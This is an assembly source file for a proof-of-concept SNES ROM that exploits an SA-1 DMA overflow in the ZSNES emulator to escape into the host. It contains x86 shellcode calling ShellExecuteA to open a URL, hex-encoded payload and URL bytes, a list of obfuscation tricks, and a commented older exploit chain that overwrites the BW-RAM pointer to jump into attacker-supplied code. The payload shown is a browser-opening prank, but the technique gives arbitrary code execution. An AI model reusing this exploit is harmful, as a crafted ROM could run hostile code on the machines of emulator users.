;;;dw $0000,$FFFF;checksum + complement
;;;;db $00,$00,$00,$00;unknown stuff
;;;;dw $5555,$5555,$FFFF;cop, brk, abort(?)
;;;;dw $5555,$FFFF,$5555;nmi, unused, irq
;;;;db $00,$00,$00,$00;unknown
;;;;dw $FFFF,$FFFF,$FFFF;(emulation) cop, unused, abort
;;;;dw $FFFF,Reset,$FFFF;(emulation) nmi, reset, irq/brk
;;;
;;;SA1Reset:
;;;;shove this into the header because screw logic
;;;LDX.w #$FE00
;;;Loop:
;;;;LDA.w !Random+$100,x
;;;;LDA.w !Encrypted+$100,x
;;;SBC.w !Random+$200,x
;;;ADC.w !Encrypted+$200,x
;;;STA $0200,x
;;;INX
;;;INX
;;;BNE Loop
;;;;-
;;;;LDA $0000,x
;;;;INX
;;;;INX
;;;;BRA -
;;;ADC $2137
;;;EOR $213C
;;;PHA ; must be <jmp to X>-1 ($001F)
;;;RTS
;;;
;;;print "sa1code: ",pc,"/00FFFC"
;;;
;;;warnpc $00FFFC
;;;org $00FFFC
;;;dw Reset
;;;
;;;
;;;
;;;
;;;
;;;
;;;
;;;
;;;
;;;
;;;
;;;
;;;
;;;
;;;
;;;
;;;
;;;
;;;
;;;
;;;
;;;
;;;
;;;
;;;
;;;
;;;
;;;
;;;
;;;
;;;
;;;if 0
;;;
;;;;Available obfuscations:
;;;;- Execute in RAM, overwrite the current program
;;;;- Use IRQ or NMI to overwrite the current program
;;;;- Use SA-1 to overwrite the current program
;;;;- Fiddle with the PPU timing registers
;;;;- Broken ZSNES ADCs
;;;;- PHK RTS, after some PEA shenanigans, or write the stack from the other processor
;;;
;;;;Required hacks:
;;;;decide RAM map
;;;;$0478 - URL start
;;;;$0493 - code start
;;;;
;;;;required data:
;;;;org $0478 ; url
;;;;db                                 $68,$74,$74,$70,$3A,$2F,$2F,$77 ;         http://w
;;;;db $61,$79,$62,$61,$63,$6B,$2E,$61,$72,$63,$68,$69,$76,$65,$2E,$6F ; ayback.archive.o
;;;;db $72,$67,$2F,$77,$65,$62,$2F,$30,$2F,$62,$79,$75,$75,$2E,$6F,$72 ; rg/web/0/byuu.or
;;;;db $67,$2F,$62,$73,$6E,$65,$73,$2F,$61,$63,$63,$75,$72,$61,$63,$79 ; g/bsnes/accuracy
;;;;db $00                                                             ; (nul)
;;;;
;;;;org $0493 ; code
;;;;db             $6A,$05,$6A,$00,$6A,$00,$68,$00,$3C,$AB,$71,$6A,$00
;;;;db $FF,$15,$B4,$27,$D0,$00,$C7,$05,$60,$FB,$CB,$00,$AE,$CD,$45,$00
;;;;db $C3
;;;;
;;;;disassembly:
;;;; push 5 ; INT nShowCmd = SW_SHOW
;;;; push 0 ; LPCTSTR lpDirectory
;;;; push 0 ; LPCTSTR lpParameters
;;;; push 0x0071A6C4+urlloc ; LPCTSTR lpFile
;;;; push 0 ; LPCTSTR lpOperation
;;;; push 0 ; HWND hwnd
;;;; call [0x00D027B4] ; ShellExecuteA
;;;; mov [0x00CBFB60],0x0045CDAE ; restore $2180 handler
;;;; ret
;;;;
;;;;also need a few checksum routines
;;;; one XOR all bytes, one ADC all bytes
;;;;
;;;;current progress:
;;;;org $0478 ; url
;;;;db                                 $  ,$  ,$  ,$  ,$  ,$  ,$  ,$
;;;;db $  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$
;;;;db $  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$
;;;;db $  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$
;;;;db $  
;;;;
;;;;org $0493 ; code
;;;;db             $  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$
;;;;db $  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$
;;;;db $
;;;;
;;;;
;;;;overwrite BW-RAM pointer via $2180 overflow from SA-1
;;;; allow write access to 0x00CB7560+($2180*4) = 0x00CBFB60, but put part of the offset at the SNES address instead
;;;; also read and math it wildly
;;;;
;;;;write the new pointer (0x0071A6C4 + IRAM pointer) to BWRAM
;;;;
;;;;read $2180 once to trigger my code
;;;
;;;assertion_failed = 0
;;;macro assert_label_eq(label, val)
;;;fillbyte 1/cos(<label>-<val>)+assertion_failed
;;;endmacro
;;;
;;;
;;;macro goto(loc)
;;;warnpc <loc>&$7FFF|$7F8000
;;;org <loc>&$7FFF|$008000
;;;base <loc>&$7FFF|$7F80000
;;;endmacro
;;;
;;;
;;;!IRAM = 0x0071A6C4
;;;!romdataptr = 0x00C62C68
;;;!NewBWRAM = 0x00CB7560+($2180*4)
;;;
;;;
;;;org $00FC00
;;;incbin random.bin
;;;
;;;org $00FC00
;;;Reset:
;;;;zsnes initializes many regs the way I want
;;;XCE
;;;;P=35 DP=0000 S=01FF
;;;REP #$FF
;;;;P=00
;;;
;;;LDA.w #Reset
;;;STA $2203
;;;STZ $2200 ; boot SA-1
;;;
;;;macro checksum(eor)
;;;LDX #$FC00
;;;-
;;;ADC $00,x
;;;EOR.w #<eor>
;;;STA $3000
;;;INX
;;;BNE -
;;;SBC $3000
;;;; this makes the other CPU influence it in random ways
;;;endmacro
;;;
;;;macro check_write(eor1, eor2)
;;;%checksum(<eor1>)
;;;TAY
;;;%checksum(<eor2>)
;;;STA $00,y
;;;endmacro
;;;
;;;;$21D0
;;;;$3220
;;;;$BAC0
;;;;$D9D1
;;;;$7AEA
;;;;$B2B2
;;;;$C299
;;;;$603D
;;;;$04B1
;;;
;;;
;;;STP
;;;
;;;;0071A6C4 - start of IRAM
;;;;00C62C68 - pointer to romdata
;;;;xxxxxxxx - pointer to wramdata
;;;
;;;
;;;
;;;
;;;EvilCode:
;;;db $6A,$05,$6A,$00,$6A,$00,$68,$00,$3C,$AB,$71,$6A,$00
;;;db $FF,$15,$B4,$27,$D0,$00,$C7,$05,$60,$FB,$CB,$00,$AE,$CD,$45,$00
;;;db $C3
;;;
;;;TheURL:
;;;db "http://wayback.archive.org/web/0/byuu.org/bsnes/accuracy",0
;;;
;;;print pc
;;;
;;;base off
;;;warnpc $00FFC0
;;;
;;;org $0083C0
;;;db "ZSNES SUCKS          ";name
;;;db $23;lorom, SA-1
;;;db $35;contains SA-1
;;;db $05;1 bank
;;;db $00;no sram
;;;db $00;ntsc
;;;db $00;licencee
;;;db $00;version
;;;dw $0000,$FFFF;checksum + complement
;;;db $00,$00,$00,$00;unknown stuff
;;;dw $5555,$5555,$FFFF;cop, brk, abort(?)
;;;dw $5555,$FFFF,$5555;nmi, unused, irq
;;;db $00,$00,$00,$00;unknown
;;;dw $FFFF,$FFFF,$FFFF;(emulation) cop, unused, abort
;;;dw $FFFF,Reset,$FFFF;(emulation) nmi, reset, irq/brk
;;;
;;;
;;;
;;;
;;;
;;;
;;;
;;;
;;;
;;;
;;;endif
;;;if 0
;;;
;;;
;;;
;;;
;;;;This is an older version. It uses another exploit mechanism that doesn't work on FuSoYa's ZSNES,
;;;; but which is a lot easier to create.
;;;
;;;;This ROM, when run in ZSNES v1.51 (official Windows build), will open a web browser on the ZMZ
;;;; download page.
;;;;Thanks to Vitor Vilela for showing me a crashy ROM (I've seen a lot of them, but never managed to
;;;; get my hands on one), and for helpfulness with various SA-1 things.
;;;
;;;;The bug is as follows:
;;;;ZSNES does not range check SA-1 DMA, but instead allows them to overflow.
;;;;The critical location is src/chips/sa1regs.asm, executesa1dma:. Using that bug, I can write up to
;;;; 64KB after BW-RAM or I-RAM.
;;;
;;;;BW-RAM is 4MB after the ROM. There's nothing interesting nearby, and 64KB isn't enough to overflow
;;;; the allocation (it's about 6MB). Exploiting a heap buffer overflow is also OS dependent.
;;;
;;;;However, I-RAM is in a more favorable location; it's a global variable.
;;;;And not only that - right after I-RAM comes a very valuable variable, namely the pointer to BW-RAM!
;;;;Overwriting that allows me to make ZSNES think BW-RAM is whereever I want, allowing me to fiddle
;;;; with one of the opcode dispatch tables. ZSNES doesn't use ASLR, so its location is known.
;;;;Or I can do it the easy way - ZSNES is UPXed, and UPX marks the entire file executable. It's not
;;;; ASLRed either. I can just point to right after the SA-1 DMA loop; I won't even need to worry about
;;;; the instruction cache, x86 automatically invalidates that. Instant victory.
;;;;I'm surprised it has remained hidden for so long.
;;;
;;;;The .S files should be assembled with 'nasm filename.S'. A pre-assembled version is included.
;;;
;;;org $008000
;;;CPUStart:
;;;CLC
;;;XCE
;;;REP #$FF
;;;LDA #$2200
;;;TCD
;;;SEP #$10
;;;
;;;;Step 1 - overwrite SA1RAMArea with a pointer I want to scribble to
;;;;Mode (no conversion, to I-RAM, from ROM)
;;;LDY #%11101000;the 1s are unused by zsnes
;;;STY $30
;;;;Source
;;;LDA.w #.First
;;;STA $32
;;;STZ $34;this hits $2235 too; it does no harm, it's overwritten later
;;;;Size
;;;LDA.w #.First_End-.First
;;;STA $38
;;;;Target offset
;;;LDA #$07FF
;;;STA $35
;;;
;;;;Mode (no conversion, to BW-RAM, from ROM)
;;;LDY #%11101100
;;;STY $30
;;;;Source
;;;LDA.w #.Second
;;;STA $32
;;;;not storing to $35, it was done last time
;;;;Size
;;;LDA.w #.Second_End-.Second
;;;STA $38
;;;;Target offset (not clearing the low byte -> offset is $FF, we subtract that from the pointer)
;;;STZ $36
;;;
;;;- BRA -
;;;
;;;.First:
;;;db 0             ; first byte in I-RAM
;;;db 0             ; I-RAM is 2049 bytes for whatever reason
;;;dd $0AB5         ; PHnum2writesa1reg; seems to only be used for savestates. It's a constant, this is the original value.
;;;dd $0062E2B5-$FF ; SA1RAMArea; the pointer I want to write to. (Luckily, both 65816 and x86 are little endian.)
;;;..End            ; $0062E2B5 is right after the SA-1 DMA loop.
;;;                 ; $FF is subtracted because it's writing to offset [$2235] from the above pointer,
;;;                 ; and I don't clear the low byte of the last transfer.
;;;
;;;.Second:
;;;;This one is short and simple; it just loads payload.bin to an unused part of ZSNES (0x006C7D17) and jumps to it.
;;;incbin loader
;;;..End
;;;
;;;; payload.S holds dependencies on this one being exactly 19 bytes
;;;; if it's not, the restore code must be changed
;;;your_loader_binary_has_wrong_length = 0
;;;fillbyte 1/cos(.Second+19-..End)+your_loader_binary_has_wrong_length
;;;
;;;
;;;dd .Payload_End-.Payload
;;;.Payload:
;;;incbin payload
;;;..End
;;;
;;;endif
;;;endif